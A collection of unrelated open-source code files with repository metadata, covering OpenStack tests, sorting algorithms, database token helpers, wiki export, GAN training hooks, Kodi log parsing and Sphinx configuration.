vol_bdm = objects.BlockDeviceMapping.get_by_volume_id(
self.context, 'fake-volume-id')
for attr in block_device_obj.BLOCK_DEVICE_OPTIONAL_ATTRS:
self.assertFalse(vol_bdm.obj_attr_is_set(attr))
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id_not_found(self, get_by_vol_id):
get_by_vol_id.return_value = None
self.assertRaises(exception.VolumeBDMNotFound,
objects.BlockDeviceMapping.get_by_volume_id,
self.context, 'fake-volume-id')
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_instance_uuid_missmatch(self, get_by_vol_id):
fake_bdm_vol = self.fake_bdm(instance={'uuid': 'other-fake-instance'})
get_by_vol_id.return_value = fake_bdm_vol
self.assertRaises(exception.InvalidVolume,
objects.BlockDeviceMapping.get_by_volume_id,
self.context, 'fake-volume-id',
instance_uuid='fake-instance')
@mock.patch.object(db, 'block_device_mapping_get_by_volume_id')
def test_get_by_volume_id_with_expected(self, get_by_vol_id):
get_by_vol_id.return_value = self.fake_bdm(
fake_instance.fake_db_instance())
vol_bdm = objects.BlockDeviceMapping.get_by_volume_id(
self.context, 'fake-volume-id', expected_attrs=['instance'])
for attr in block_device_obj.BLOCK_DEVICE_OPTIONAL_ATTRS:
self.assertTrue(vol_bdm.obj_attr_is_set(attr))
get_by_vol_id.assert_called_once_with(self.context, 'fake-volume-id',
['instance'])
def _test_create_mocked(self, cell_type=None, update_or_create=False,
device_name=None):
if cell_type:
self.flags(enable=True, cell_type=cell_type, group='cells')
else:
self.flags(enable=False, group='cells')
values = {'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume',
'instance_uuid': 'fake-instance'}
if device_name:
values['device_name'] = device_name
fake_bdm = fake_block_device.FakeDbBlockDeviceDict(values)
with test.nested(
mock.patch.object(
db, 'block_device_mapping_create', return_value=fake_bdm),
mock.patch.object(
db, 'block_device_mapping_update_or_create',
return_value=fake_bdm),
mock.patch.object(cells_rpcapi.CellsAPI,
'bdm_update_or_create_at_top')
) as (bdm_create_mock, bdm_update_or_create_mock, cells_update_mock):
bdm = objects.BlockDeviceMapping(context=self.context, **values)
if update_or_create:
method = bdm.update_or_create
else:
method = bdm.create
if cell_type == 'api':
self.assertRaises(exception.ObjectActionError,
method)
else:
method()
if update_or_create:
bdm_update_or_create_mock.assert_called_once_with(
self.context, values, legacy=False)
else:
bdm_create_mock.assert_called_once_with(
self.context, values, legacy=False)
if cell_type == 'compute' and 'device_name' in values:
self.assertEqual(1, cells_update_mock.call_count)
self.assertTrue(len(cells_update_mock.call_args[0]) > 1)
self.assertEqual(cells_update_mock.call_args[0][0],
self.context)
self.assertIsInstance(cells_update_mock.call_args[0][1],
block_device_obj.BlockDeviceMapping)
self.assertEqual(cells_update_mock.call_args[1],
{'create': update_or_create or None})
else:
self.assertFalse(cells_update_mock.called)
def test_create_nocells(self):
|
gregpuzzles1/Sandbox
|
Example Programs/Ch_11_Student_Files/Case Study/algorithms.py
|
Python
|
gpl-3.0
| 1,983
| 0.004539
|
"""
File: algorithms.py
Algorithms configured for profiling.
"""
from profiler import Profiler
def selectionSort(lyst, profiler):
i = 0
while i < len(lyst) - 1: # Do n - 1 searches
minIndex = i # for the largest
j = i + 1
while j < len(lyst): # Start a search
profiler.comparison()
if lyst[j] < lyst[minIndex]:
minIndex = j
j += 1
if minIndex != i: # Exchange if needed
swap(lyst, minIndex, i, profiler)
i += 1
def bubbleSort(lyst, profiler):
n = len(lyst)
while n > 1: # Do n - 1 bubbles
i = 1 # Start each bubble
while i < n:
profiler.comparison()
if lyst[i] < lyst[i - 1]: # Exchange if needed
swap(lyst, i, i - 1, profiler)
i += 1
n -= 1
def bubbleSort2(lyst, profiler):
n = len(lyst)
while n > 1:
swapped = False
i = 1
while i < n:
if lyst[i] < lyst[i - 1]: # Exchange if needed
swap(lyst, i, i - 1, profiler)
swapped = True
                # if trace: print(lyst)  # optional debug trace; 'trace' is not defined in this module
i += 1
profiler.comparison()
if not swapped: return
n -= 1
def insertionSort(lyst, profiler):
i = 1
while i < len(lyst):
itemToInsert = lyst[i]
j = i - 1
while j >= 0:
|
profiler.comparison()
if itemToInsert < lyst[j]:
lyst[j + 1] = lyst[j]
profiler.exchange()
j -= 1
else:
break
lyst[j + 1] = itemToInsert
profiler.exchange()
|
i += 1
def swap(lyst, i, j, profiler):
"""Exchanges the elements at positions i and j."""
profiler.exchange()
temp = lyst[i]
lyst[i] = lyst[j]
lyst[j] = temp
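The sorts above import Profiler from a companion profiler module that is not included in this file; a minimal stand-in such as the following (an assumed interface, not the textbook's actual Profiler) is enough to exercise them:

# Assumed stand-in: the sorts only ever call comparison() and exchange().
import random

class SimpleProfiler(object):
    def __init__(self):
        self.comparisons = 0
        self.exchanges = 0
    def comparison(self):
        self.comparisons += 1
    def exchange(self):
        self.exchanges += 1

if __name__ == "__main__":
    data = [random.randint(0, 99) for _ in range(20)]
    p = SimpleProfiler()
    insertionSort(data, p)  # defined above; sorts in place
    print("sorted: %s" % data)
    print("comparisons: %d, exchanges: %d" % (p.comparisons, p.exchanges))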
|
byn9826/Thousand-Day
|
handlers/token.py
|
Python
|
bsd-3-clause
| 1,530
| 0.007843
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mysql.connector
#from token find userId
#return 0 for error
def findUser(userToken, cnx):
userQuery = 'SELECT user_id FROM user_token WHERE user_token = %s'
try:
userCursor = cnx.cursor()
userCursor.execute(userQuery, (userToken, ))
return userCursor.fetchone()
#return 0 for db error
    except mysql.connector.Error as err:
print('Something went wrong: {}'.format(err))
return '0'
finally:
userCursor.close()
#create new token
#return 1 for success
#return 0 for error
def addToken(userId, userToken, cnx):
addQuery = 'INSERT INTO user_token (user_id, user_token) VALUES (%s, %s) ON DUPLICATE KEY UPDATE user_token = %s'
try:
addCursor = cnx.cursor()
addCursor.execute(addQuery, (userId, userToken, userToken))
cnx.commit()
return '1'
except mysql.connector.Error as err:
print('Something went wrong: {}'.format(err))
cnx.rollback()
return '0'
finally:
addCursor.close()
#delete token
#return 1 for success
#return 0 for fail
def deleteToken(userId, cnx):
cleanQuery = 'DELETE FROM user_token WHERE user_id = %s'
try:
cleanCursor = cnx.cursor()
cleanCursor.execute(cleanQuery, (userId, ))
cnx.commit()
return '1'
except mysql.connector.Error as err:
cnx.rollback()
print('Something went wrong: {}'.format(err))
return '0'
finally:
cleanCursor.close()
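A usage sketch for the three helpers above; the connection parameters and database name are placeholders, and a user_token(user_id, user_token) table is assumed from the queries:

# Placeholders throughout -- adjust credentials and database name.
import mysql.connector

cnx = mysql.connector.connect(user='app', password='secret',
                              host='127.0.0.1', database='thousand_day_db')
print(addToken(42, 'example-token', cnx))  # '1' on success, '0' on DB error
print(findUser('example-token', cnx))      # (42,) if found, None if missing, '0' on DB error
print(deleteToken(42, cnx))                # '1' on success, '0' on failure
cnx.close()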
|
unreal666/outwiker
|
plugins/export2html/export2html/branchexporter.py
|
Python
|
gpl-3.0
| 7,572
| 0.008429
|
# -*- coding: UTF-8 -*-
import os.path
import re
from outwiker.core.tree import WikiDocument
from outwiker.utilites.textfile import readTextFile, writeTextFile
from .exporterfactory import ExporterFactory
from .indexgenerator import IndexGenerator
class BranchExporter (object):
def __init__ (self, startpage, nameGenerator, application):
self.__startpage = startpage
self.__application = application
self.__indexfname = u"__index.html"
self.__contentfname = u"__content.html"
        # List of errors that occurred during export
self.__log = []
self.__nameGenerator = nameGenerator
self.__a_tag_regex = re.compile (
"""
(<\s*a\s+
(.*?)
href\s*=['"](.*?)['"]
(.*?)>)
""",
re.IGNORECASE | re.MULTILINE | re.DOTALL | re.VERBOSE)
        # Dictionary that records what each page was named during export
        # Key - page, value - the name of its directory or file (without extension) after export
self.__renames = {}
@property
def log (self):
return self.__log
def export (self, outdir, imagesonly, alwaysOverwrite):
self.__log = []
self.__renames = {}
self.__export (self.__startpage,
self.__startpage,
outdir,
imagesonly,
alwaysOverwrite)
self.__replacePageLinks (outdir)
try:
self.__createIndex (outdir, alwaysOverwrite)
except IOError as e:
str (e)
return self.log
def __createIndex (self, outdir, alwaysOverwrite):
"""
        Create the table of contents
"""
indexpath = os.path.join (outdir, self.__indexfname)
contentpath = os.path.join (outdir, self.__contentfname)
indexgenerator = IndexGenerator (self.__startpage, self.__renames)
indexgenerator.generatefiles (indexpath, contentpath)
def __replacePageLinks (self, outdir):
"""
        Adjust the links to the pages
"""
for page in list(self.__renames.keys()):
fullname = os.path.join (outdir, self.__renames[page] + u".html")
try:
text = readTextFile(fullname)
newtext = self.__replacePageLinksInText (text, page, outdir)
writeTextFile(fullname, newtext)
except BaseException as error:
self.__log.append (u"{0}: {1}".format (page.title, str(error)))
def __replacePageLinksInText (self, text, page, outdir):
matches = self.__a_tag_regex.findall (text)
hrefMatchIndex = 2
fullMatchIndex = 0
result = text
for match in matches:
url = match[hrefMatchIndex]
if not url:
continue
            # Check that this is not a link to a website
if self.__isInternetUrl (url):
continue
            # Check that this is not a link to a file
if self.__isFileLink (url, outdir):
continue
linkToPage = None
anchor = None
linkToPage, anchor = self.__getPageByProtocol (url)
            # Is this a link to a subpage?
if linkToPage is None:
linkToPage = page[url]
if linkToPage is None:
                # Is this a link to a page relative to the root?
correcturl = url[1:] if url[0] == "/" else url
linkToPage = page.root[correcturl]
if linkToPage is None:
continue
if linkToPage not in list(self.__renames.keys()):
continue
            # This page is the one we need
            # The new link
newhref = self.__renames[linkToPage] + ".html"
if anchor is not None:
newhref += anchor
newFullLink = match[fullMatchIndex].replace (url, newhref)
result = result.replace (match[fullMatchIndex], newFullLink)
return result
def __getPageByProtocol (self, href):
"""
        If href is a protocol of the form page://..., return the page the link leads to (if it exists); otherwise return None.
"""
        # Since support for this protocol only appeared in version 1.8.0,
        # check whether self.__application has a pageUidDepot member
if "pageUidDepot" not in self.__application.__dict__:
return (None, None)
protocol = u"page://"
if not href.startswith (protocol):
return (None, None)
        # Strip the protocol
uid = href[len (protocol):]
        # Strip everything after the /
        slashPos = uid.find ("/")
uid_clean = uid[: slashPos] if slashPos != -1 else uid
page = self.__application.pageUidDepot[uid_clean]
anchor = self.__getAnchor (uid)
return (page, anchor)
def __getAnchor (self, href):
"""
        Try to find the anchor if a link of the form page://... is used
"""
pos = href.rfind ("/#")
if pos != -1:
return href[pos + 1:]
return None
def __isInternetUrl (self, url):
return (url.startswith ("http://") or
url.startswith ("https://") or
url.startswith ("ftp://") or
url.startswith ("mailto:"))
def __isFileLink (self, url, outdir):
fname = os.path.join (outdir, url)
return os.path.exists (fname) and os.path.isfile (fname)
def __export (self,
page,
root,
outdir,
imagesonly,
alwaysOverwrite):
"""
        page - the page from which to start exporting
        root - the root page from which the overall export started (used to determine file names)
        outdir - the directory to export into
        imagesonly - keep only images among the attachments?
        alwaysOverwrite - overwrite existing files?
"""
if page.getTypeString() != WikiDocument.getTypeString():
try:
exporter = ExporterFactory.getExporter (page)
exportname = self.__nameGenerator.getName (page)
self.__renames[page] = exportname
exporter.export (outdir, exportname, imagesonly, alwaysOverwrite)
except BaseException as error:
self.__log.append (u"{0}: {1}".format (page.title, str(error)))
for child in page.children:
self.__export (
child,
root,
outdir,
imagesonly,
alwaysOverwrite)
|
thp44/delphin_6_automation
|
data_process/wp6_v2/not_in_sample.py
|
Python
|
mit
| 3,478
| 0.003163
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
from delphin_6_automation.database_interactions.db_templates import delphin_entry
from delphin_6_automation.database_interactions.db_templates import sample_entry
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_dict
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
def correct_delphin():
samples = sample_entry.Sample.objects().only('delphin_docs')
print(f'There is {samples.count()} samples in DB')
sample_projects = []
for sample in samples:
if len(sample.delphin_docs) == 0:
print(f'Sample {sample.id} has no delphin projects. Deleting!')
sample.delete()
else:
for delphin in sample.delphin_docs:
sample_projects.append(delphin.id)
print(f'There is {len(sample_projects)} connected to a sample')
projects = delphin_entry.Delphin.objects().only('id')
print(f'There are currently {len(projects)} projects in the database')
print('Starting')
for proj in projects:
if proj.id not in sample_projects:
#print(f'Project with ID: {proj.id} is not part of a sample!')
proj.delete()
def correct_sample():
samples = sample_entry.Sample.objects()
for sample in samples:
docs = []
for ref in sample.delphin_docs:
delphin_projects = delphin_entry.Delphin.objects(id=ref.id)
if delphin_projects:
docs.append(delphin_projects.first())
else:
print(f'Found non existent project: {ref.id}')
sample.delphin_docs = docs
sample.save()
def correct_strategy():
strategy = sample_entry.Strategy.objects().first()
keep = []
for sample in strategy.samples:
found_sample = sample_entry.Sample.objects(id=sample.id)
if found_sample:
keep.append(found_sample.first().id)
else:
print(f"Sample {sample.id} was not in the DB")
print(f"Found samples {len(keep)} to keep: {keep}")
strategy.samples = keep
strategy.save()
def modify_sample():
id_ = "5e7878ce582e3e000172996d"
sample = sample_entry.Sample.objects(id=id_).first()
print('Got sample')
sample.mean = {}
sample.standard_deviation = {}
sample.save()
def correct_sample2():
samples = sample_entry.Sample.objects().only('id')
print(f"There is {samples.count()} samples in DB")
for i in range(samples.count()):
samples = sample_entry.Sample.objects(iteration=i).only('id')
print(f'There is {samples.count()} with iteration {i}')
if samples.count() > 1:
print(f"There is {samples.count()} samples with iteration {i}")
            for j, sample in enumerate(samples):
if j == 0:
pass
else:
print(f'Deleting: {sample.id}')
#sample.delete()
if __name__ == '__main__':
server = mongo_setup.global_init(auth_dict)
#modify_sample()
#correct_sample()
#correct_sample2()
correct_delphin()
correct_strategy()
|
mongo_setup.global_end_ssh(server)
|
a25kk/apm
|
docs/conf.py
|
Python
|
mit
| 5,991
| 0.006343
|
# -*- coding: utf-8 -*-
# Build configuration file.
# This file is execfile()d with the current directory set to its
# containing dir.
# Note that not all possible configuration values are present in this
# autogenerated file.
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
from datetime import datetime
project = u'apm.buildout'
copyright = u'%s, Serge Davidov.' % datetime.now().year
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'buildoutdoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual])
latex_documents = [
('index',
'buildout.tex',
u'apm.buildout Documentation',
   u'', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
255BITS/HyperGAN
|
hypergan/train_hooks/negative_momentum_train_hook.py
|
Python
|
mit
| 887
| 0.021421
|
import torch
from hypergan.train_hooks.base_train_hook import BaseTrainHook
class NegativeMomentumTrainHook(BaseTrainHook):
def __init__(self, gan=None, config=None, trainer=None):
super().__init__(config=config, gan=gan, trainer=trainer)
self.d_grads = None
self.g_grads = None
def gradients(self, d_grads, g_grads):
if self.d_grads is None:
self.d_grads = [torch.zeros_like(_g) for _g in d_grads]
self.g_grads = [torch.zeros_like(_g) for _g in g_grads]
        new_d_grads = [g.clone() for g in d_grads]
new_g_grads = [g.clone() for g in g_grads]
d_grads = [_g - self.config.gamma * _g2 for _g, _g2 in zip(d_grads, self.d_grads)]
        g_grads = [_g - self.config.gamma * _g2 for _g, _g2 in zip(g_grads, self.g_grads)]
self.d_grads = new_d_grads
self.g_grads = new_g_grads
return [d_grads, g_grads]
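The adjustment applied above is simply g_new = g - gamma * g_previous for each parameter's gradient; a standalone illustration on plain tensors (arbitrary values, not HyperGAN's API):

# Standalone sketch of the negative-momentum update; gamma and the values are arbitrary.
import torch

gamma = 0.1
g_prev = torch.tensor([1.0, 2.0, 3.0])  # gradient from the previous step
g_curr = torch.tensor([0.5, 1.5, 2.5])  # gradient from the current step
g_adjusted = g_curr - gamma * g_prev
print(g_adjusted)  # tensor([0.4000, 1.3000, 2.2000])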
|
probonopd/video2smarttv
|
yt2chromecast.py/usr/bin/video2chromecast.py
|
Python
|
mit
| 240
| 0.008333
|
#!/usr/bin/python
import time, sys
if len(sys.argv) > 1:
    video = sys.argv[1]
else:
video = "REjj1ruFQww"
try:
import pychromecast
pychromecast.play_youtube_video(video, pychromecast.PyChromecast().host)
except:
pass
|
novoid/Memacs
|
memacs/kodi.py
|
Python
|
gpl-3.0
| 6,858
| 0.00175
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import datetime
import json
import logging
import sys
import time
from itertools import tee, islice, chain
from orgformat import OrgFormat
from memacs.lib.orgproperty import OrgProperties
from memacs.lib.reader import UnicodeDictReader
from .csv import Csv
# stolen from https://stackoverflow.com/questions/1011938/python-previous-and-next-values-inside-a-loop/1012089#1012089
def previous_current_next(some_iterable):
prevs, items, nexts = tee(some_iterable, 3)
prevs = chain([None], prevs)
nexts = chain(islice(nexts, 1, None), [None])
return zip(prevs, items, nexts)
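A quick illustration of the helper above (not part of the original module):

# previous_current_next pairs each item with its neighbours, padding both ends with None:
#   >>> list(previous_current_next(['a', 'b', 'c']))
#   [(None, 'a', 'b'), ('a', 'b', 'c'), ('b', 'c', None)]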
class Kodi(Csv):
def _parser_add_arguments(self):
"""
overwritten method of class Memacs
add additional arguments
"""
super()._parser_add_arguments()
self._parser.add_argument(
'--action-field',
dest="action_field",
required=True,
action='store',
help='field name of the action (start/paused,stopped)',
type=str.lower)
self._parser.add_argument(
'--identification-fields',
dest="identification_fields",
required=True,
action='store',
help='field names to uniquely identify one track e.g. title,artist',
type=str.lower)
self._parser.add_argument(
'--minimal-pause-duration',
dest='minimal_pause_duration',
required=False,
action='store',
default=0,
help=
'minimal duration in seconds of a pause to be logged as a pause instead of being ignored',
type=int,
)
self._parser.add_argument(
'--start-actions',
dest='start_actions',
required=False,
action='store',
default='started,resumed',
help=
            'comma separated action commands when track is started (default started,resumed)'
)
self._parser.add_argument(
'--stop-actions',
dest='stop_actions',
required=False,
action='store',
default='stopped,paused',
help=
            'comma separated action commands when track is stopped/paused (default stopped,paused)'
)
def _parser_parse_args(self):
"""
overwritten method of class Memacs
all additional arguments are parsed in here
"""
super()._parser_parse_args()
self._args.stop_actions = [
name.strip() for name in self._args.stop_actions.split(',')
]
self._args.start_actions = [
name.strip() for name in self._args.start_actions.split(',')
]
if self._args.identification_fields:
self._args.identification_fields = [
name.strip()
for name in self._args.identification_fields.split(',')
]
def read_timestamp(self, row):
if not self._args.timestamp_format:
timestamp = datetime.datetime.fromtimestamp(
int(row[self._args.timestamp_field]))
else:
timestamp = time.strptime(row[self._args.timestamp_field],
self._args.timestamp_format)
return timestamp
def format_timestamp(self, timestamp):
# show time with the timestamp format, but only
# if it contains at least hours and minutes
show_time = not self._args.timestamp_format or \
any(x in self._args.timestamp_format for x in ['%H', '%M'])
timestamp = OrgFormat.date(timestamp,show_time=show_time)
return timestamp
def read_properties(self, row):
properties = OrgProperties(data_for_hashing=json.dumps(row))
output = self._args.output_format.format(**row)
if self._args.properties:
for prop in self._args.properties.split(','):
properties.add(prop.upper().strip(), row[prop])
return properties
def write_one_track(self, row, start_time, stop_time):
properties = self.read_properties(row)
output = self._args.output_format.format(**row)
self._writer.write_org_subitem(
timestamp=self.format_timestamp(start_time) + '--' +
self.format_timestamp(stop_time),
output=output,
properties=properties)
def tracks_are_identical(self, row1, row2):
for field in self._args.identification_fields:
if row1[field] != row2[field]:
return False
return True
def track_is_paused(self, row, next_row):
return next_row and self.tracks_are_identical(row, next_row) and (
self.read_timestamp(next_row) - self.read_timestamp(row)
).total_seconds() < self._args.minimal_pause_duration
def read_log(self, reader):
"""goes through rows and searches for start/stop actions"""
start_time, stop_time = None, None
for prev_row, row, next_row in previous_current_next(reader):
timestamp = self.read_timestamp(row)
action = row[self._args.action_field]
if action in self._args.start_actions:
if not start_time:
start_time = timestamp
elif prev_row and not self.track_is_paused(prev_row, row):
self.write_one_track(prev_row, start_time, timestamp)
start_time = timestamp
elif action in self._args.stop_actions and start_time:
if not self.track_is_paused(row, next_row):
stop_time = timestamp
else:
stop_time = None
if start_time and stop_time:
if self.tracks_are_identical(row, prev_row):
self.write_one_track(row, start_time, stop_time)
start_time, stop_time = None, None
def _main(self):
"""
        gets called automatically from the Memacs class
"""
with self._args.csvfile as f:
try:
reader = UnicodeDictReader(f, self._args.delimiter,
self._args.encoding,
self._args.fieldnames)
if self._args.skip_header:
                    next(reader)
self.read_log(reader)
except TypeError as e:
logging.error("not enough fieldnames or wrong delimiter given")
logging.debug("Error: %s" % e)
sys.exit(1)
except UnicodeDecodeError as e:
logging.error(
"could not decode file in utf-8, please specify input encoding"
|
)
sys.exit(1)
|
fengbeihong/tempest_automate_ironic
|
tempest/api/volume/test_volume_transfers.py
|
Python
|
apache-2.0
| 4,317
| 0
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from testtools import matchers
from tempest.api.volume import base
from tempest import clients
from tempest.common import credentials
from tempest import config
from tempest import test
CONF = config.CONF
class VolumesV2TransfersTest(base.BaseVolumeTest):
@classmethod
def skip_checks(cls):
super(VolumesV2TransfersTest, cls).skip_checks()
if not credentials.is_admin_available():
msg = "Missing Volume Admin API credentials in configuration."
raise cls.skipException(msg)
@classmethod
def setup_credentials(cls):
super(VolumesV2TransfersTest, cls).setup_credentials()
# Add another tenant to test volume-transfer
cls.os_alt = clients.Manager(cls.isolated_creds.get_alt_creds())
# Add admin tenant to cleanup resources
creds = cls.isolated_creds.get_admin_creds()
cls.os_adm = clients.Manager(credentials=creds)
@classmethod
def setup_clients(cls):
super(VolumesV2TransfersTest, cls).setup_clients()
cls.client = cls.volumes_client
cls.alt_client = cls.os_alt.volumes_client
cls.alt_tenant_id = cls.alt_client.tenant_id
cls.adm_client = cls.os_adm.volumes_client
def _delete_volume(self, volume_id):
# Delete the specified volume using admin creds
self.adm_client.delete_volume(volume_id)
self.adm_client.wait_for_resource_deletion(volume_id)
@test.attr(type='gate')
@test.idempotent_id('4d75b645-a478-48b1-97c8-503f64242f1a')
def test_create_get_list_accept_volume_transfer(self):
# Create a volume first
volume = self.create_volume()
self.addCleanup(self._delete_volume, volume['id'])
# Create a volume transfer
transfer = self.client.create_volume_transfer(volume['id'])
transfer_id = transfer['id']
auth_key = transfer['auth_key']
self.client.wait_for_volume_status(volume['id'],
'awaiting-transfer')
# Get a volume transfer
body = self.client.show_volume_transfer(transfer_id)
self.assertEqual(volume['id'], body['volume_id'])
# List volume transfers, the result should be greater than
# or equal to 1
body = self.client.list_volume_transfers()
self.assertThat(len(body), matchers.GreaterThan(0))
# Accept a volume transfer by alt_tenant
body = self.alt_client.accept_volume_transfer(transfer_id,
auth_key)
self.alt_client.wait_for_volume_status(volume['id'], 'available')
@test.idempotent_id('ab526943-b725-4c07-b875-8e8ef87a2c30')
def test_create_list_delete_volume_transfer(self):
# Create a volume first
volume = self.create_volume()
self.addCleanup(self._delete_volume, volume['id'])
# Create a volume transfer
body = self.client.create_volume_transfer(volume['id'])
transfer_id = body['id']
self.client.wait_for_volume_status(volume['id'],
'awaiting-transfer')
# List all volume transfers (looking for the one we created)
body = self.client.list_volume_transfers()
        for transfer in body:
if volume['id'] == transfer['volume_id']:
break
else:
            self.fail('Transfer not found for volume %s' % volume['id'])
# Delete a volume transfer
self.client.delete_volume_transfer(transfer_id)
self.client.wait_for_volume_status(volume['id'], 'available')
class VolumesV1TransfersTest(VolumesV2TransfersTest):
_api_version = 1
|
holli-holzer/python-docx
|
docx/engines/DjangoEngine.py
|
Python
|
mit
| 1,123
| 0.010686
|
import os
import django
from django.conf import settings; settings.configure()
from docx.engines.base import Engine as base
from django.template import Template, Context
"""
Engine for Django
"""
class Engine(base):
    def __init__(self):
        self.tag_re = "(\{[^\}]+?\}\}?)"
"""
Fix the template and feed it to the engine
"""
def render(self, template, context):
django.setup()
self._register_filters()
xml = self.fix_tag_gaps(template)
xml = self.fix_block_tags(xml)
self.template = Template(xml)
return self.template.render(Context(context)).encode("utf8")
"""
Load custom template filters from docx/engines/filters/django/*.py
"""
def _register_filters(self):
path = os.path.join(os.path.dirname(__file__), "filters", "django")
for file in os.listdir(path):
if file.endswith(".py") and file != "__init__.py":
module = "filters.django.%s" % file.replace(".py", "")
__import__(module, globals(), locals() )
|
Rob-Rau/EbbCFD
|
ms_refinement/plot_conv.py
|
Python
|
mit
| 2,727
| 0.005501
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
from math import sqrt
from math import log
dx = [1/sqrt(16), 1/sqrt(64), 1/sqrt(256), 1/sqrt(1024)]
dx_tri = [1/sqrt(32), 1/sqrt(128), 1/sqrt(512), 1/sqrt(2048)]
dx_pert = [0.0270466, 0.0134827, 0.00680914, 0.00367054]
dx_fp = [0.122799, 0.081584, 0.0445639, 0.0225922, 0.0113763]
fp_actual = 0.0441995
rl2_euler = [0.00059068, 0.000113051, 2.26156e-05, 5.11884e-06]
rl2_euler_tri = [0.00101603, 0.000277795, 6.37774e-05, 1.4947e-05]
rl2_euler_tri_pert = [0.00053851, 0.000121805, 2.67446e-05, 4.97857e-05]
rl2_euler_tri_limited = [0.00234712, 0.000548344, 0.000139978, 3.56414e-05]
rl2_euler_lp_tri_limited = [0.00242227, 0.000586065, 0.000140727]
rl2_euler_limited = [0.00187271, 0.000435096, 0.000120633, 2.90233e-05]
rl2_euler_lp_limited = [0.00180033, 0.000422567, 0.000120477, 2.90644e-05]
rl2_ns = [0.000576472, 0.000132735, 7.0506e-05, 6.67272e-05]
rl2_ns_fp = [abs(fp_actual - 0.008118), abs(fp_actual - 0.015667), abs(fp_actual - 0.026915), abs(fp_actual - 0.037524), abs(fp_actual - 0.042895)]
print("rho euler
|
l2: "+str(log(rl2_euler[2]/rl2_euler[3])/log(dx[2]/dx[3])))
print("rho euler tri l2: "+str(log(rl2_euler_tri[2]/rl2_euler_tri[3])/log(dx_tri[2]/dx_tri[3])))
